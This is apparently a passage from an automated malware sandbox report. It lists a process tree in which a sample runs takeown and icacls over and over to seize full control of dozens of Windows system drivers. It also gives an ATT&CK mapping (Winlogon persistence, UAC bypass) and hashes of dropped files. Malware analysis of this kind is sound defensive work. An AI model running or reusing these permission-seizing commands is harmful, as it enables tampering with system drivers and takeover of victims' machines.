C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\spsys.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit2⤵PID:4352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv.sys3⤵
- Modifies file permissions
PID:4360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv.sys /grant "Admin:F"3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit2⤵PID:4432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv2.sys3⤵PID:4896
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srv2.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit2⤵PID:4320
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srvnet.sys3⤵PID:4604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\srvnet.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit2⤵PID:4636
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stexstor.sys3⤵PID:4968
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\stexstor.sys /grant "Admin:F"3⤵PID:4780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit2⤵PID:4868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storport.sys3⤵PID:5084
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\storport.sys /grant "Admin:F"3⤵PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit2⤵PID:4148
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storvsc.sys3⤵PID:4776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\storvsc.sys /grant "Admin:F"3⤵PID:4196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit2⤵PID:5028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stream.sys3⤵PID:4340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\stream.sys /grant "Admin:F"3⤵PID:4416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit2⤵PID:5064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\swenum.sys3⤵
- Modifies file permissions
PID:5048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\swenum.sys /grant "Admin:F"3⤵PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit2⤵PID:4836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Synth3dVsc.sys3⤵PID:4348
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "Admin:F"3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit2⤵PID:4908
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tape.sys3⤵PID:4256
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tape.sys /grant "Admin:F"3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit2⤵PID:3200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpip.sys3⤵PID:4832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tcpip.sys /grant "Admin:F"3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit2⤵PID:4464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpipreg.sys3⤵PID:4812
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tcpipreg.sys /grant "Admin:F"3⤵PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit2⤵PID:4380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdi.sys3⤵
- Modifies file permissions
PID:3272
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdi.sys /grant "Admin:F"3⤵PID:4780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit2⤵PID:4316
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdpipe.sys3⤵PID:4360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdpipe.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit2⤵PID:4892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdtcp.sys3⤵
- Possible privilege escalation attempt
PID:5108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdtcp.sys /grant "Admin:F"3⤵PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit2⤵PID:5008
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdx.sys3⤵
- Modifies file permissions
PID:5056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tdx.sys /grant "Admin:F"3⤵PID:4180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit2⤵PID:4212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\termdd.sys3⤵
- Possible privilege escalation attempt
PID:5048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\termdd.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit2⤵PID:4604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\terminpt.sys3⤵PID:4624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\terminpt.sys /grant "Admin:F"3⤵PID:4988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit2⤵PID:4596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tssecsrv.sys3⤵PID:4508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tssecsrv.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit2⤵PID:4164
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbFlt.sys3⤵PID:4140
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "Admin:F"3⤵PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit2⤵PID:4916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbGD.sys3⤵
- Possible privilege escalation attempt
PID:4500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit2⤵PID:4260
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tsusbhub.sys3⤵PID:3272
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tsusbhub.sys /grant "Admin:F"3⤵PID:3600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit2⤵PID:4852
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tunnel.sys3⤵
- Possible privilege escalation attempt
PID:4532
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tunnel.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit2⤵PID:4420
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\UAGP35.SYS3⤵PID:4780
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\UAGP35.SYS /grant "Admin:F"3⤵
- Modifies file permissions
PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit2⤵PID:4788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\udfs.sys3⤵PID:4372
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\udfs.sys /grant "Admin:F"3⤵PID:4848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit2⤵PID:4208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS3⤵PID:4796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "Admin:F"3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit2⤵PID:3692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umbus.sys3⤵PID:4644
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\umbus.sys /grant "Admin:F"3⤵PID:4156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit2⤵PID:5108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umpass.sys3⤵PID:5084
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\umpass.sys /grant "Admin:F"3⤵PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit2⤵PID:4568
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usb8023.sys3⤵PID:4396
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usb8023.sys /grant "Admin:F"3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit2⤵PID:4920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit2⤵PID:4508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbccgp.sys3⤵PID:4708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usbccgp.sys /grant "Admin:F"3⤵PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit2⤵PID:4388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit2⤵PID:5032
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution (2)
Winlogon Helper DLL (2)
Event Triggered Execution (1)
Change Default File Association (1)
Privilege Escalation
Abuse Elevation Control Mechanism (1)
Bypass User Account Control (1)
Boot or Logon Autostart Execution (2)
Winlogon Helper DLL (2)
Event Triggered Execution (1)
Change Default File Association (1)
Downloads
-
C:\Users\Admin\Desktop\5Çæ▐čœ■ž¾š■ÿ▬ñ◘π87č◙▬ñœ9◙™☺2₧♠₧—↕ä♠øš™ß↑ו±↕▬ä3č◘■å╥╩╔¬®☻ž▄é■∩╧╥41○æń↑½9ñεž∞ö2↑¬3µï╔↑╬¾®½■ń¶▬2—√õ♀Ÿ¤
Filesize
666B
MD5
9e1e5883c74742a497cf5c272ccd2321
SHA1
2cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256
ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512
f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b
-
Filesize
103KB
MD5
373d53d7c6709d5106b29a26a71b0d31
SHA1
1708009c111266ba513503e06b94a5ccd402dee5
SHA256
de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
SHA512
15b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d